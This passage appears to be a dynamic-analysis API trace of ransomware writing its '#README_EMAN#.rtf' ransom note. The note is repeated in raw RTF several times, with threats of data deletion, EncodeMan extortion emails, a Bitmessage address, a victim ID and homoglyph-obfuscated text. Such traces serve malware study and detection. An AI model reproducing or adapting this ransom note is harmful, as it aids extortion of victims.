loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0297.608] WriteFile (in: hFile=0x294, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.608] CloseHandle (hObject=0x294) returned 1 [0297.608] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\#readme_eman#.rtf")) returned 0xffffffff [0297.608] GetLastError () returned 0x2 [0297.608] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0297.609] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.609] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the 